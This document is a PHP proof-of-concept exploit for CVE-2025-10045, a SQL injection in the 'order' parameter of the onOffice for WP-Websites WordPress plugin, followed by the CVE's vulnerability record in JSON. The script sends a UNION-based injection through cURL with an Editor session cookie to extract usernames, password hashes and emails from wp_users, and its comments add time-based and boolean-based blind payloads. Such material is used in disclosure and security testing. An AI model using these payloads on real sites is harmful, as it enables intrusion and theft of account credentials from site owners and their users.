CVE-2025-10045

<?php /** * CVE-2025-10045 PoC - SQL Injection via 'order' parameter * Target: onOffice for WP-Websites WordPress Plugin <= 6.5.1 * Vulnerability: SQL Injection in RecordManagerReadListViewEstate.php * * Note: This PoC demonstrates the injection point via the 'order' parameter * used in the list view estate sorting functionality. */ // Example of vulnerable SQL query construction (simplified): // $query = "SELECT * FROM wp_oo_plugin_records ORDER BY " . $_GET['order']; // Malicious 'order' parameter payload for extracting data via UNION-based injection: // Note: Requires Editor-level authentication to access the vulnerable endpoint. $target_url = "https://target-wordpress-site.com/wp-admin/admin.php?page=onoffice"; $malicious_order = "1 UNION SELECT user_login, user_pass, user_email, 4, 5, 6, 7, 8, 9, 10, 11, 12 FROM wp_users-- -"; // cURL request with authentication cookies (Editor-level access required) $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $target_url . "&order=" . urlencode($malicious_order)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_COOKIE, "wordpress_logged_in_xxxxx=EDITOR_SESSION_COOKIE"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $response = curl_exec($ch); curl_close($ch); echo $response; // Alternative: Time-based blind injection payload for the 'order' parameter: // $malicious_order = "1 AND (SELECT SLEEP(5) FROM wp_users WHERE user_login='admin')-- -"; // Alternative: Boolean-based blind injection payload: // $malicious_order = "1 AND (SELECT SUBSTRING(user_pass,1,1) FROM wp_users WHERE ID=1)='\$'"; ?>

{"cve": {"id": "CVE-2025-10045", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:36.600", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The onOffice for WP-Websites plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter in all versions up to, and including, 6.5.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Editor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3447130/onoffice-for-wp-websites/trunk/plugin/Record/RecordManagerReadListViewEstate.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/259010bd-ccb4-4907-bea8-f49e6464eaa1?source=cve", "source": "[email protected]"}]}}